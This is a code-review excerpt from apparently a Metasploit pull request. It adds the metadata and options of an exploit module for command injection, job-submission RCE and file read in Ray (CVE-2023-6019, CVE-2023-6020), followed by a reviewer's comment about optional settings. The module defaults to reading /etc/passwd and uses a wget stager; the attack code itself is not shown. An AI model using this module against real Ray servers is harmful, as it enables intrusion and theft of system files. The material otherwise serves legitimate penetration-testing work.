modules/exploits/linux/http/ray_cmdi_rce_lfi.rb

```diff
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE and Ray static arbitrary file read',
+        'Description' => %q{
+          Ray RCE via cpu_profile command injection vulnerability.
+
+          RCE in Ray via the agent job submission endpoint.
+          This is intended functionality as Ray's main purpose is executing arbitrary workloads.
+          By default Ray has no authentication.
+
+          Ray before 2.6.3 is vulnerable to a local file inclusion.
+        },
+        'Author' => [
+          'sierrabearchell',                      # Vulnerability discovery
+          'byt3bl33d3r <marcello@protectai.com>', # Python Metasploit module
+          'danmcinerney <dan@protectai.com>',     # Python Metasploit module
+          'Takahiro Yokoyama'                     # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6019'],
+          ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],
+          # RCE
+          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],
+          ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'],
+          ['CVE', '2023-6020'],
+          ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'],
+          ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
+        ],
+        'CmdStagerFlavor' => %i[wget],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
+          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+        ],
+        'DefaultOptions' => { 'MeterpreterTryToFork' => true },
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-11-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8265),
+        OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]),
+        OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]),
+        OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd'])
```

Comment:
```suggestion
        OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]),
        OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd'])
```
I don't think both of these options are always required depending on the selected CVE/RCE, it wouldn't be clear to a user in which scenario each option is used either
It may be better to not mark them required and add in checks on the code paths where you are going to use that option
not super opinionated on this though, just throwing it out there

Reply:
Thank you! See. https://github.com/rapid7/metasploit-framework/pull/19363/commits/b7e4247d22bac04649c592a94605a6f17727d606